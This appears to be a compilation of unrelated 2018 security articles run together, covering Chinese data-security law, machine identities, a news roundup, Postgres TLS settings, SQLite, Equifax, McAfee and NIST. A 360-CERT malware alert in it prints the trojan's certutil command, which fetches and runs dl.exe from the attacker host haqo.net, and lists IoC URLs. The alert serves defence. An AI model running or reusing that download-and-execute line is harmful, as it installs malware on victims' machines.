In the cold of winter, looking back at global data security in 2018, a feeling that "winter has come" is hard to avoid. From the start of the year, when data on 87 million Facebook users was unlawfully used for political ends, to the end of the year, when up to 500 million personal records were stolen from Marriott's Starwood systems; from the US Clarifying Lawful Overseas Use of Data Act, aimed at cross-border data access, to the EU's General Data Protection Regulation with its long-arm jurisdiction, the security risks and political challenges around data kept multiplying. It is precisely against this backdrop that China's Data Security Law, added to the legislative plan in 2018, takes on special significance. At this critical juncture in its drafting, it is worth offering some thoughts on core questions such as its positioning, purpose and stance.

A "big" data security law or a "small" one?

The systemic positioning of the Data Security Law is a threshold question. Viewed from its object of regulation and legislative purpose, the law could take two different paths:

The first is a "big data security law": taking all data, and "big data" in particular, as its object, following the data lifecycle to establish a series of procedures, standards and roles for data storage, access, verification, protection and use, and defining the corresponding duties, obligations and rights of government, enterprises and individuals, thereby regulating data security comprehensively.

The second is a "small data security law": taking as its object only "key (important) data closely related to national security, economic development and the public interest", and focusing on risk prevention and management for such data. Clearly, this approach fits better with the national top-level design. If we start from the Data Security Law's superior law, the National Security Law, then without doubt its real task is controlling data risks that endanger national security and public safety. At the same time, limiting the scope to "key (important) data" not only lowers the difficulty of drafting and eases alignment with laws such as the Cybersecurity Law and a future Personal Information Protection Law, but also allows rich foreign experience to be drawn upon, aiding international exchange and mutual understanding.

Under the "small data security law" architecture, defining "key (important) data" is the hard problem. The existing draft Measures for Security Assessment of Cross-Border Transfer of Personal Information and Important Data and the draft standard Information Security Technology: Guidelines for Cross-Border Data Transfer Security Assessment define such data chiefly by its nature, sweeping in anything that could endanger national security, defence interests, international relations, the national economic order and financial security, state property, individuals' lawful rights and interests, or the nation's politics, territory, military, economy, culture, society, science and technology, information, ecology, resources or nuclear facilities. That is exhaustive, but it lacks operability and clarity, making both government enforcement and corporate compliance difficult. Here the US "Controlled Unclassified Information" regime offers a useful model: through a rigorous registry it lists 17 categories in detail, including agriculture, controlled technical information, critical infrastructure, emergency management, export control, finance, geodetic product information, information systems vulnerability information, intelligence, international agreements, law enforcement, nuclear, privacy, procurement and acquisition, proprietary business information, security act information, statistics and tax. China's Data Security Law could absorb this experience and, combining it with the views of Chinese industries and their regulators, further clarify the concrete scope while retaining some flexibility to keep pace with the times and with technology.

"Security first" or "development first"?

Just as Articles 1 and 3 of China's Cybersecurity Law embody the two values of security and development, the Data Security Law must likewise balance data security against data circulation and use. As the core production factor of the digital economy, data is becoming the breakthrough point of technological innovation, the new engine of economic transformation and innovative development, and an effective tool of social governance. For enterprises, data is the oil of the 21st century; for individuals, data is a re-presentation of their lives; for government, data is a foundational strategic resource. The Data Security Law must therefore take the circulation and use of data seriously.

Network information technology is a self-generating system, which means that, fundamentally, data security problems are resolved through the development of data technology. This explains why the UK's 2011 Cyber Security Strategy specifically proposed turning threats into opportunities: cultivating commercial opportunities in cybersecurity, driving technical progress, and building the UK a competitive cybersecurity advantage in cyberspace. China's National Cyberspace Security Strategy points the same way. Judging the opportunities to outweigh the challenges, that strategy puts development on an equal footing with security and makes "implementing the development concepts of innovation, coordination, green, openness and sharing" its primary strategic goal.

Indeed, the idea that cybersecurity and development go hand in hand has become a national consensus. On 27 February 2014, Xi Jinping said at the first meeting of the Central Leading Group for Cybersecurity and Informatization that cybersecurity and informatization are two wings of one body and two wheels of one engine; the relationship between security and development must be handled so that they are coordinated and advance in step, with security safeguarding development and development promoting security, to build lasting stability and enduring order. On 25 April 2016, Xi further noted at the national work conference on cybersecurity and informatization that network security is dynamic rather than static, open rather than closed, and relative rather than absolute; the pursuit of absolute security regardless of cost must therefore be avoided, lest it become a heavy burden or even rob Peter to pay Paul. The Data Security Law should accordingly uphold a balanced philosophy, taking "security as the guarantee of development, development as the purpose of security" as its legislative aim, and build the data security defence line through the joint participation of government, enterprises, the public and social organisations.

Is data sovereignty "defensive" or "offensive"?

Data sovereignty is to the Data Security Law what network sovereignty is to the Cybersecurity Law: not only the national stance we hold, but the fundamental compass for handling data security. Although the State Council's Action Programme for Promoting Big Data Development proposed "strengthening the capacity to protect data sovereignty in cyberspace" as early as August 2015, the institutional design of data sovereignty has never taken shape. To implement data sovereignty, the first question is whether the Data Security Law should prioritise "defence" or "offence".

"Defence" means emphasising control over data leaving the country. Internationally this is generally done in two ways: data export restrictions and data localisation. The former is exemplified by the US Export Administration Regulations and the International Traffic in Arms Regulations, which subject the export of certain important data to licensing; the latter by Russia's law On Information, Information Technologies and Information Protection and its Personal Data Law, which strictly require internet information service disseminators, information owners and operators to keep data within Russia.

"Offence" means emphasising cross-border access to data. The current international trend is that the network powers are all actively seeking cross-border data jurisdiction. The US Clarifying Lawful Overseas Use of Data Act, for example, abandoned the earlier "data storage location" standard for a "data controller" standard: whoever controls communications, records or other information must comply with US compulsory orders regardless of whether the data is stored inside the United States. Likewise, the long-arm jurisdiction of the EU's General Data Protection Regulation extends beyond the EU's borders.

Does China value "defence" or "offence" more? On the one hand, we must of course attend to defence. Article 37 of the Cybersecurity Law established a data export security assessment regime for "operators of critical information infrastructure", but its scope is clearly too narrow; hence the Cyberspace Administration's draft Measures for Security Assessment of Cross-Border Transfer of Personal Information and Important Data extends the assessment to "important data". Since those Measures are only a departmental rule lacking a clear superior-law basis, the Data Security Law is urgently needed to supply their legality. Meanwhile, facing US and EU cross-border data access, China's International Criminal Judicial Assistance Law, enacted in October 2018, provides that "without the consent of the competent authorities of the People's Republic of China, no institution, organisation or individual within the territory of the People's Republic of China may provide evidentiary materials or the assistance prescribed by this Law to foreign countries." But that provision is confined to criminal matters; the Data Security Law needs to make more detailed and comprehensive provisions. On the other hand, we must also attend to offence. As Chinese enterprises deploy globally and the Belt and Road deepens, our data security also faces a "switch from defence to offence". The Data Security Law should change with the situation, moving from traditional "territorial jurisdiction" to "protective jurisdiction": taking the protection of natural persons, enterprises and national interests within China as its aim, the law should apply whenever those interests are infringed, whether the data processing occurs inside or outside China.

No doubt, alternating between offence and defence easily produces the paradox of "attacking one's own shield with one's own spear". That is precisely where legislative wisdom is needed: to strike compromises in concrete scenarios, taking some things and leaving others.

The international contest over data security has only just begun. Facing BT Group's move to strip Huawei equipment from the core of its existing 3G and 4G networks, Huawei responded on 6 December that network security issues should not be "over-politicised". In reality, network security issues, data security included, can never be free of politics. Rather than trying to escape politics, the task is to find compromise and consensus among conflicting demands and, through legal rules and effective dialogue, ultimately build a just and reasonable new order for global cyberspace. (The author, Xu Ke, is executive director of the Center for Digital Economy and Legal Innovation at the University of International Business and Economics.)


Want a More Secure, More Effective Cloud? Watch Your Machine Identities.



kdobieski

Fri, 12/14/2018 15:45

Guest Blogger: Kim Crawley

Long before the invention and adoption of the cloud, the importance of protecting user identities, the identities of people, was obvious. File systems and operating systems going as far back as the 1970s, if not earlier, have had user access built-in. People are assigned usernames and passwords, and files and folders are configured to be accessible only to certain users or user groups.

There are many different methods of authentication, but passwords are one of the oldest and most frequently implemented. If I want to install a new package on my Linux desktop, I’d better know my root password! An attempt by a cyber attacker to privilege escalate within my operating system may entail trying to crack my root password. This is why organizations spend lots of money and resources to make sure that only authorized users have access to their authentication credentials. These user identities can apply to individual devices, local networks, wide area networks, online services, and cloud networks of all kinds.

Users have identities, but so do machines, including those in the cloud. A classic type of machine identity is a TLS certificate for an HTTPS website, or any other sort of TLS/SSL encrypted internet service. Code-signing certificates are machine identities that help to verify that software is authentic and legitimate. Also, machine identities such as SSH keys can help assure that only authorized clients can securely gain remote access to sensitive computer systems via the SSH protocol. But what I’d most like to talk about today is how TLS certificates can be used as machine identities for microservices and containers within cloud networks.
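As a small sketch of treating a TLS certificate as a machine identity (our illustration, using only Python's standard library), connect to a service and inspect the identity it presents:

import socket
import ssl

def peer_identity(host, port=443):
    ctx = ssl.create_default_context()   # verifies the chain and hostname
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    return {
        "subject": cert.get("subject"),
        "issuer": cert.get("issuer"),
        "not_after": cert.get("notAfter"),   # expiry is worth monitoring
    }

print(peer_identity("www.venafi.com"))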


*** This is a Security Bloggers Network syndicated blog from Rss blog authored by kdobieski. Read the original post at: https://www.venafi.com/blog/want-more-secure-more-effective-cloud-watch-your-machine-identities

【安全帮】Critical flaw nearly exposed 400 million Microsoft accounts; freelance hackers can earn up to $500,000 a year testing for bugs ...


Summary: GitLab launches a public bug bounty programme with a top reward of $12,000. This week, the open-source Git repository management system GitLab announced a public bug bounty programme. Researchers who find severe vulnerabilities in its products and services can earn up to $12,000. GitLab aims to make software development easier and more efficient by providing an open-source platform covering the entire DevOps life...

GitLab launches public bug bounty programme with a top reward of $12,000

This week, the open-source Git repository management system GitLab announced a public bug bounty programme. Researchers who find severe vulnerabilities in its products and services can earn up to $12,000. GitLab aims to make software development easier and more efficient by providing an open-source platform covering the whole DevOps lifecycle. While similar to GitHub in many respects, GitLab recently raised $100 million in funding and offers a broader range of services. In 2014, GitLab launched a vulnerability disclosure programme with the help of HackerOne. Last year, the company said its small private bounty programme had paid about $200,000 for roughly 250 vulnerabilities found by more than 100 white-hat hackers. GitLab has now decided to run a public bounty programme through HackerOne, covering GitLab installations, production services and other products such as its SaaS service. Researchers are invited to report SQL injection, remote code execution, XSS, CSRF, directory traversal, privilege escalation and information disclosure vulnerabilities.

Source:

http://codesafe.cn/index.php?r=news/detail&id=4615

Critical vulnerabilities nearly exposed 400 million Microsoft accounts

Sahad Nk, an Indian bounty hunter working at SafetyDetective, discovered and reported to Microsoft a series of critical vulnerabilities in Microsoft accounts, receiving a bounty of undisclosed size. The flaws affected the Microsoft accounts behind users' MS Office files, Outlook mail and more; in other words, accounts of every type (over 400 million) and data of every type were at risk. Chained together, the vulnerabilities formed a perfect attack vector for gaining access to a user's Microsoft account; all an attacker needed was to get the user to click a link. Sahad Nk wrote in a blog post that a Microsoft subdomain, success.office.com, was misconfigured, which is why he was able to take control of it using a CNAME record (the canonical record linking one domain to another). Using CNAME records, Sahad could locate the misconfigured subdomain and point it at his personal Azure instance, gaining control of the subdomain and of all the data it received.

Source:

https://tech.sina.com.cn

Freelance hackers can earn up to $500,000 a year hunting bug bounties

According to US media reports, the latest figures from bug bounty platform Bugcrowd show that elite freelance hackers can earn more than $500,000 a year by finding and reporting security vulnerabilities for companies such as Tesla and organisations such as the US Department of Defense. Founded in San Francisco in 2012, Bugcrowd is one of a handful of so-called "bug bounty" companies that find and report software security vulnerabilities for clients. These companies give hackers a platform to safely hunt for flaws in the software of companies that want to be tested. Hackers work under contract for a specific company and are paid a bounty when they find defects in that company's infrastructure; how much they are paid depends on the severity of the vulnerabilities they discover. Bugcrowd CEO Casey Ellis said that with millions of positions in the field unfilled, companies are increasingly looking for alternatives for their cybersecurity testing. It is estimated that by 2021 there may be as many as 3.5 million unfilled cybersecurity jobs.

Source:

http://tech.qq.com/a/20181212/013702.htm

Facebook admits software bug put photos of 6.8 million users at risk

The social network Facebook has admitted that a software bug left the photos of up to 6.8 million users at risk of being accessed without their consent. Affected users will receive a notification warning them that their photos may have been exposed. Facebook also said it will work with developers to delete the copies of photos they should not have had access to. In total, up to 1,500 apps from 876 different developers may have improperly accessed users' pictures. Facebook said the bug was related to an error in Facebook Login and its photo API, which lets developers access Facebook photos within their own apps. All affected users had logged in to third-party apps with their Facebook accounts and granted those apps some level of access to view their photos.

Source:

https://www.cnbeta.com/articles/tech/798641.htm

Training outfit sold student data; Anhui police dismantle a grey industry chain

Police in Langya district of Chuzhou, Anhui province, have cracked a case of trafficking in students' personal information affecting many parts of the province, seizing more than 200,000 records of student data and over ten computers used in the crime. Four suspects have been placed in criminal detention. In early November, during the "Clean Internet 2018" campaign, Langya police learned that a training institution next to Chuzhou No. 5 Middle School held personal information on students of many local primary and secondary schools, covering students' names and classes as well as their parents' names, contact details and employers. On 22 November, a task force raided the institution, seizing more than 10,000 records on students and parents on the spot and confiscating three computers. With all the suspects arrested, the whole criminal chain surfaced: to recruit students and build his reputation, a suspect surnamed Shu had obtained a set of primary and secondary school enrolment records for Anhui province from a friend surnamed Zhang, then packaged and resold the information, which spread through the market from one buyer to the next. So far, the Langya public security branch has taken compulsory measures against four suspects, surnamed Yan, Fu, Liang and Shu, on suspicion of infringing citizens' personal information.

Source:

http://www.xinhuanet.com/local/2018-12/12/c_1123843102.htm

Republican congressman proposes "Wall Coins" to fund the US-Mexico border wall

US President Trump wants to build a wall on the US-Mexico border, but the project has yet to win funding from Congress. Ohio Representative Warren Davidson has proposed a new way to fund it: raising money on a crowdfunding site, or issuing a digital currency using blockchain technology, which he calls "Wall Coins". Late last month he submitted the bill "Buy a Brick, Build a Wall Act" to Congress, which would allow the Treasury Secretary to accept small donations for building the wall and set up an account, the Border Wall Trust Fund, to manage the money.

Source:

https://www.solidot.org/story?sid=58960

Italian oil and gas services company Saipem says it was hit by a cyberattack from India

According to Reuters, the Italian oil and gas services company Saipem (SPMI.MI) said it identified a cyberattack on Monday that mainly affected its servers in the Middle East. Mauro Piasere, Saipem's head of digital and innovation, told Reuters the attack chiefly hit the company's servers in the Middle East, including Saudi Arabia, the United Arab Emirates and Kuwait. He added that the servers at the company's main operating centres in Italy, France and the UK were unaffected. Piasere said the company is working to restore the affected systems from backups; the circumstances suggest the servers were most likely hit by ransomware. "The servers involved have been shut down for the time being in order to assess the scale of the attack. The backup systems will be activated once the threat has been eliminated," Piasere said. "No data has been lost, because all our systems have backups." He also revealed that the attack came from Chennai, India, though the attackers' identity remains unknown.

Source:

https://www.hackeye.net/securityevent/17864.aspx

About 安全帮

安全帮 (Anquanbang) is the security team of China Telecom's Beijing Research Institute, committed to becoming a "leader in SaaS security services". It currently has a "1+4" product line: one SaaS store (www.anquanbang.vip) and four platforms (an SDS software-defined security platform, a security capability open platform, a security big data platform, and a security situational awareness platform).




Postgres 12 highlight - Controlling SSL protocol


The following commit has happened in Postgres 12, adding a feature which allows controlling, and potentially enforcing, the protocol versions SSL connections can use when connecting to the server:

commit: e73e67c719593c1c16139cc6c516d8379f22f182
author: Peter Eisentraut <peter_e@gmx.net>
date: Tue, 20 Nov 2018 21:49:01 +0100

Add settings to control SSL/TLS protocol version

For example:

    ssl_min_protocol_version = 'TLSv1.1'
    ssl_max_protocol_version = 'TLSv1.2'

Reviewed-by: Steve Singer <steve@ssinger.info>
Discussion: https://www.postgresql.org/message-id/flat/1822da87-b862-041a-9fc2-d0310c3da173@2ndquadrant.com

As mentioned in the commit message, this commit introduces two new GUC parameters:

- ssl_min_protocol_version, to control the minimal version used as communication protocol.
- ssl_max_protocol_version, to control the maximum version used as communication protocol.

Those can also take different values, which differ depending on what the version of OpenSSL PostgreSQL is compiled with is able to support, with values going from TLS 1.0 to 1.3: TLSv1, TLSv1.1, TLSv1.2, TLSv1.3. An empty string can also be used for the maximum, to mean that anything is supported, which gives more flexibility for upgrades. Note that within a given range, the latest protocol will be the one used by default.

Personally, I find the possibility to enforce that quite useful, as up to Postgres 11 the backend automatically takes the newest protocol available, with SSLv2 and SSLv3 disabled by being hardcoded in the code. However, requirements sometimes pop up demanding that at least a given TLS protocol be enforced. Such things would not matter for most users, but for some large organizations it can make sense to enforce this kind of control. This is also useful for testing a protocol when doing development on a specific patch, which can happen when working on things like SSL-specific features for authentication. Another area where this can be useful is when a flaw is found in a specific protocol, to make sure that connections fall back to a safer default, so flexibility is nice to have from all those angles.

From an implementation point of view, this makes use of a set of specific OpenSSL APIs to control the minimum and maximum protocols:

- SSL_CTX_set_min_proto_version
- SSL_CTX_set_max_proto_version

These have been added in OpenSSL 1.1.0; still, PostgreSQL provides a set of compatibility wrappers which make use of SSL_CTX_set_options for older versions of OpenSSL, so this is not actually a problem when compiling with other versions, especially since OpenSSL 1.0.2 is the current LTS (long-term support) version of upstream at this point.
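One quick way to see the result (our sketch, assuming psycopg2 is installed and the server has SSL enabled) is to ask the pg_stat_ssl view, available since PostgreSQL 9.5, which protocol the current session negotiated:

import psycopg2

conn = psycopg2.connect("host=localhost dbname=postgres sslmode=require")
with conn.cursor() as cur:
    cur.execute("SELECT ssl, version, cipher FROM pg_stat_ssl "
                "WHERE pid = pg_backend_pid()")
    ssl_used, version, cipher = cur.fetchone()
    # With ssl_min_protocol_version = 'TLSv1.2', version should be at
    # least TLSv1.2 here; an older client would fail to connect instead.
    print(ssl_used, version, cipher)
conn.close()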

Alert: Malicious Program Delivered Through the 驱动人生 ("Driver Life") Upgrade Component



Report number: B6-2018-121501

Report source: 360-CERT

Report authors: 360 Core Security Team, 360-CERT

Updated: 2018-12-15

0x00 Overview

On the afternoon of 14 December 2018, the 360 Internet Security Center detected a batch of downloader trojans delivered through the upgrade component of 人生日历 ("Life Calendar"). The trojan has remote code execution capability: after launch, it sends detailed information about the victim's computer to the trojan's server and receives remote instructions to carry out its next step.

The trojan also carries an EternalBlue exploit component, which it can use to attack other machines on the local network and the internet.

360 Security Guard intercepted and removed the trojan immediately and submitted it to the vendor for handling.

360-CERT hereby issues this alert and asks users to apply protection and scan for the virus in good time.

0x01 Technical analysis

At 14:00 on 14 December 2018, 人生日历, a product of 驱动人生, began delivering and executing the trojan f79cb9d2893b254cc75dfb7f3e454a69.exe through its upgrade component DTLUpg.exe. Delivery volume grew from 18:00; at 23:00 we notified the vendor of our findings and distribution stopped.

By 21:00 on 14 December, the trojan had attacked more than 57,000 computers (not counting exploit-based spread; 360 Security Guard includes EternalBlue immunisation).

After execution, the trojan installs a service named Ddriver to persist on the system, then sends detailed information about the host to the server haqo.net, including:

- Computer name
- Operating system version
- Hardware and software details, etc.

It then executes shellcode instructions returned by the server.



The trojan can also update itself, download and execute files remotely, and create services remotely.

After starting, and on instruction from its server, the trojan downloads an EternalBlue exploitation tool and uses it to attack other computers on the local network and the internet. After a successful attack, it uses certutil as a springboard to install the trojan on the other machine (other trojans can also be installed, as decided by the cloud server).

certutil -urlcache -split -f hxxp://dl.haqo.net/dl.exe c:\install.exe&c:\install.exe&……

The trojan's C&C is still active, and the further instructions it receives are still being analysed.

The analysis above was provided by the 360 Core Security Team.

0x02 Remediation and recommendations

- Use 360 Security Guard to scan for and remove the virus promptly (its built-in EternalBlue immunisation protects users from this trojan's attacks)
- Back up important data
- Strengthen system security: upgrade software and install operating system patches promptly
- Temporarily close unnecessary server ports (such as 135, 139 and 445)
- Use strong passwords on servers and never weak credentials, to prevent brute-force attacks

0x03 Related IoCs

hxxp://p.abbny.com/im.png

hxxp://i.haqo.net/i.png

hxxp://dl.haqo.net/eb.exez

hxxp://dl.haqo.net/dl.exe

ackng.com

74e2a43b2b7c6e258b3a3fc2516c1235

2e9710a4b9cba3cd11e977af87570e3b

f79cb9d2893b254cc75dfb7f3e454a69

93a0b974bac0882780f4f1de41a65cfd

0x04 Timeline

2018-12-14: The 360 Internet Security Center detected the trojan

2018-12-15: 360-CERT and the 360 Core Security Team published this alert

Statement: This article comes from 360-CERT; copyright belongs to the author. The content represents only the author's independent views, not the position of 安全内参; it is republished to share information. To republish, please contact the original author for authorisation.

Critical SQLite Flaw Leaves Millions of Apps Vulnerable to Hackers



Cybersecurity researchers have discovered a critical vulnerability in widely used SQLite database software that exposes billions of deployments to hackers.

Dubbed 'Magellan' by Tencent's Blade security team, the newly discovered SQLite flaw could allow remote attackers to execute arbitrary or malicious code on affected devices, leak program memory or crash applications.

SQLite is a lightweight, widely used disk-based relational database management system that requires minimal support from operating systems or external libraries, making it compatible with almost every device, platform, and programming language.

SQLite is the most widely deployed database engine in the world today, used by millions of applications with literally billions of deployments, including IoT devices, macOS and Windows apps, major web browsers, Adobe software, Skype and more.

Since Chromium-based web browsers―including Google Chrome, Opera, Vivaldi, and Brave―also support SQLite through the deprecated Web SQL database API, a remote attacker can easily target users of affected browsers just by convincing them to visit a specially crafted web page.

"After testing Chromium was also affected by this vulnerability, Google has confirmed and fixed this vulnerability," the researchers said in a blog post .

SQLite has released updated version 3.26.0 of its software to address the issue after receiving responsible disclosure from the researchers.

Google has also released Chromium version 71.0.3578.80 to patch the issue and pushed the patched version to the latest releases of Google Chrome and the Brave web browser.

Tencent researchers said they successfully built a proof-of-concept exploit using the Magellan vulnerability and successfully tested it against Google Home.

Since most applications can't be patched anytime soon, the researchers have decided not to disclose technical details or proof-of-concept exploit code to the public.

"We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible," the researchers said.

Since SQLite is used by everybody, including Adobe, Apple, Dropbox, Firefox, Android, Chrome, Microsoft and a bunch of other software vendors, the Magellan vulnerability is a noteworthy issue, even if it has not yet been exploited in the wild.

Users and administrators are highly recommended to update their systems and affected software versions to the latest release as soon as they become available.
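One easy check (a sketch; 3.26.0 is the fixed release named above): many applications embed SQLite indirectly, for example through Python's sqlite3 module, so inspect the library version your runtime actually links against.

import sqlite3

print("bundled SQLite library:", sqlite3.sqlite_version)
if tuple(map(int, sqlite3.sqlite_version.split("."))) < (3, 26, 0):
    print("this SQLite predates the Magellan fix; upgrade the runtime")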

Stay tuned for more information.

Alexa can now arm your home security system ― including Amazon’s Ring Alarm


You would think that Amazon’s Ring home security system and Amazon’s Echo smart speakers would intelligently work together, right? You’d be mostly wrong ― but today, the company is taking another small step towards tying them together by letting you arm, disarm, and check the status of some Ring, ADT, Honeywell, Abode, and Scout security systems just by asking Alexa to do so.

And since I recently bought a Ring Alarm for my own house ― Dan convinced me with his review ― I decided to give the new functionality a spin this afternoon.

It’s a pretty simple integration, honestly. You install the Ring skill from the Skill Store in your Alexa app, make sure Alexa can see your alarm system, and then you can use the following commands (in the United States):

Alexa, arm Ring
Alexa, set Ring to Home / Away
Alexa, is Ring armed?
Alexa, disarm Ring

It’s a little bit easier than flipping open the Ring app, waiting for it to connect to the Alarm base station and tapping a button, but only by a little, and there doesn’t seem to be a way to even tell which of your door or window sensors has been tripped.

Mind you, the disarm command only works if you explicitly enable it in the skill’s settings page and also say your PIN ― which makes sense, because you wouldn’t want a burglar just shouting “ALEXA, DISARM RING” from outside your home before they break in.

Amazon announced today that it’s opening up its Security Panel Controller API to other device manufacturers as well, so you can probably expect that list of supported alarms to expand.

Amazon’s also rolling out an invite-only preview of its Alexa Guard feature today, which gives Alexa the ability to listen for a glass window breaking, or a smoke alarm blaring, and alert you right away. That’d come in handy for Ring owners too, because Ring doesn’t offer window break sensors yet.

If you want to sign up for notifications about when you can try Alexa Guard, too, you’ll find that in the Alexa App > Settings > Guard > Notify Me When Available.

I’d be negligent if I didn’t point out there are a couple other, limited ways that Ring can work with Amazon’s voice assistant today. You can ask Alexa to show your Ring Doorbell’s video feed on an Echo Show or Fire TV (which isn’t a Ring-exclusive feature) and you can use an Echo as an extra doorbell chime as well.

The Equifax breach report


The House Oversight and Government Reform Committee released a report on the big Equifax data breach that happened last year. In a nutshell, a legacy application called ACIS contained a known vulnerability that attackers used to gain access to internal Equifax databases.

The report itself is… frustrating. There is some good content here. The report lays out multiple factors that enabled the breach, including:

- A scanner that was run but missed the vulnerable app because of the directory that the scan ran in
- An expired SSL certificate that prevented Equifax from detecting malicious activity
- The legacy nature of the vulnerable application (originally implemented in the 1970s)
- A complex IT environment that was the product of multiple acquisitions
- An organizational structure where the chief security officer and the chief information officer were in separate reporting structures

The last bullet, about the unconventional reporting structure for the chief security officer, along with the history of that structure, was particularly insightful. It would have been easy to leave out this sort of detail in a report like this.

On the other hand, the report exhibits some weapons-grade hindsight bias. To wit:

Equifax, however, failed to implement an adequate security program to protect this sensitive data. As a result, Equifax allowed one of the largest data breaches in U.S. history. Such a breach was entirely preventable .

Equifax failed to fully appreciate and mitigate its cybersecurity risks. Had the company taken action to address its observable security issues prior to this cyberattack, the data breach could have been prevented.

Page 4

Equifax knew its patch management process was ineffective. The 2015 Patch Management Audit concluded “vulnerabilities were not remediated in a timely manner,” and “systems were not patched in a timely manner.” In short, Equifax recognized the patching process was not being properly implemented, but failed to take timely corrective action.

Page 80

The report highlights a number of issues that, if they had been addressed, would have prevented or mitigated the breach, including:

Lack of a clear owner of the vulnerable application. An email went out announcing the vulnerability, but nobody took action to patch the vulnerable app.

Lack of a comprehensive asset inventory. The company did not have a database they could query to check whether any published vulnerability applied to an application in use.

Lack of network segmentation in the environment where the vulnerable app ran. The vulnerable app ran on a network that was not segmented from unrelated databases. Once the app was compromised, it was used as a vector to reach these other databases.

Lack of file integrity monitoring (FIM). FIM could have detected malicious activity, but it wasn’t in place.

Not prioritizing retiring the legacy system. This one is my favorite. From the report: “Equifax knew about the security risks inherent in its legacy IT systems, but failed to prioritize security and modernization for the ACIS environment”.

Use of NFS. The vulnerable system had an NFS mount that allowed the attackers to access a number of files.

Frustratingly, the report does not go into any detail about how the system got into this state. It simply lays them out like an indictment for criminal negligence. Look at all of these deficiencies! They should have known better! Even worse, they did know better and didn’t act!

There was also a theme that anyone who has worked on a software project would recognize:

[Former Chief Security Officer Susan] Mauldin stated Equifax was in the process of making the ACIS application Payment Card Industry (PCI) Data Security Standard (DSS) compliant when the data breach occurred.

Mauldin testified the PCI DSS implementation “plan fell behind and these items did not get addressed.” She stated:

A. The PCI preparation started about a year before, but it’s very complex. It was a very complex very complex environment.

Q. [A] year before, you mean August 2016?

A. Yes, in that timeframe.

Q. And it was scheduled to be complete by August 2017?

A. Right.

Q. But it fell behind?

A. It fell behind.

Q. Do you know why?

A. Well, what I recall from the application team is that it was very complicated, and they were having it just took a lot longer to make the changes than they thought. And so they just were not able to get everything ready in time.

Pages 80-81

And, along the same lines:

So there were definitely risks associated with the ACIS environment that we were trying to remediate and that’s why we were doing the CCMS upgrade.

It was just it was time consuming, it was risky . . . and also we were lucky that we still had the original developers of the system on staff.

So all of those were risks that I was concerned about when I came into this role. And security was probably also a risk, but it wasn’t the primary driver. The primary driver was to get off the old system because it was just hard to manage and maintain.

Graeme Payne, former Senior Vice President and Chief Information Officer for Global Corporate Platforms, page 82

Good luck finding a successful company that doesn’t face similar issues.

Finally, in a beautiful example of scapegoating, there’s the Senior VP that Equifax fired, ostensibly for failing to forward an email that had already been sent to an internal mailing list. In the scapegoat’s own words:

To assert that a senior vice president in the organization should be forwarding vulnerability alert information to people . . . sort of three or four layers down in the organization on every alert just doesn’t hold water, doesn’t make any sense. If that’s the process that the company has to rely on, then that’s a problem.

Graeme Payne, former Senior Vice President and Chief Information Officer for Global Corporate Platforms, page 51

Veteran Security Software Firm McAfee May Be Sold Again; Intel Once Lost More Than $3 Billion on It



According to people familiar with the matter, private equity firm Thoma Bravo is in preliminary talks to acquire security software company McAfee from TPG and Intel, at a price well above the $4.2 billion valuation Intel sold at in 2016.

The sources said the talks could still fall apart and a deal is not expected to be announced soon. They insisted on anonymity because the negotiations are private.

Founded by John McAfee in 1987, McAfee has historically developed network security software for personal computers and servers, protecting users from malware and other viruses. This type of computer security defends personal devices against attack. More recently, it has expanded into mobile devices and cloud computing, which is where the hackers have migrated.

The company remained public until 2010, when Intel acquired it for $7.6 billion, hoping to couple its chips tightly with McAfee's security technology. That vision never materialised, and when Intel announced in 2016 that it would sell 51% of the business to TPG at a $4.2 billion valuation, it took a loss of more than $3 billion. A few months later, TPG brought in Thoma Bravo for a minority investment.

TPG's majority ownership helped the McAfee business transform through bolt-on acquisitions in under two years. In January, McAfee completed its acquisition of Skyhigh Networks, which helps companies monitor the cloud services their employees use. In March, McAfee also bought Tunnelbear, which provides virtual private networks that protect data when shared WiFi accounts are used.

One source said Intel now sees itself as a purely financial investor in McAfee; if the Thoma Bravo deal succeeds, Intel stands to recoup some of the investment it lost. Two sources said the deal would unify McAfee's ownership and could take the company public again.

Reuters reported in November that Thoma Bravo had made an acquisition offer to Symantec. One of the sources said an acquisition of McAfee would rule out a Symantec deal.

Spokespeople for TPG and Intel declined to comment. A Thoma Bravo spokesperson did not immediately respond.

One Article to Understand NIST's Upgraded Critical Infrastructure Protection Framework


On 12 February 2014, the US National Institute of Standards and Technology (NIST) formally released version 1.0 of the Framework for Improving Critical Infrastructure Cybersecurity. The framework's basic idea is a set of risk-focused processes for managing security risk, applicable across the broad field of critical infrastructure.



The document was the product of Executive Order 13636, issued by President Obama, and was developed to create a "common language" for security risk management applicable across industrial and technology sectors. To ensure scalability and room for innovation, the framework strives to be "technology-neutral": first, it relies on existing standards, guidelines and practices so that critical infrastructure providers can achieve resilience; second, it relies on global standards, guidelines and practices (developed, managed and updated by industry), so that tools and methods realising the framework's outcomes work across national borders, acknowledge the global nature of cybersecurity risk, and can evolve along with technology and business needs.

From a certain angle, then, the document is a "standardised implementation guide for critical infrastructure security risk management", helping the organisations responsible for national finance, energy, healthcare and other critical systems better protect their information and assets and withstand cyberattacks.

Now, four years after the initial release, NIST has published version 1.1 of the Framework for Improving Critical Infrastructure Cybersecurity.

Like the initial version, framework 1.1 is a public-private collaboration shaped by feedback collected through public comment, questions received by the team, and revisions arising from multiple workshops. The new version refines, clarifies and improves on 1.0. Version 1.1 remains flexible, can meet an organisation's business or mission needs, and applies to a wide range of technology environments, such as information technology, industrial control systems and the Internet of Things.

The updates in framework 1.1 reportedly include:

- authentication and identity;
- self-assessment of cybersecurity risk;
- managing cybersecurity risk within supply chains;
- vulnerability disclosure.

What has changed in the new version

First, version 1.1 renames the "Access Control" category to "Identity Management and Access Control", to better account for authentication and authorisation.

The new version also adds a section titled "Section 4.0: Self-Assessing Cybersecurity Risk with the Framework", explaining how organisations can use the framework to understand and assess their cybersecurity risk, including the use of measurements.

The document notes that cybersecurity performance measurement is changing rapidly, and organisations should be thoughtful, creative and careful in their use of measurement, in order to optimise its value while making progress in improving cybersecurity risk management. Judging cyber risk requires guiding criteria, and those criteria must be regularly assessed and updated to match the changing needs of the times.

On the supply chain, the expanded Section 3.3 helps users better understand risk management in this area, while a new section (3.4) focuses on buying decisions and on using the framework to understand the risk associated with commercial off-the-shelf (COTS) products, i.e. purchasable software or hardware with interfaces defined by open standards.

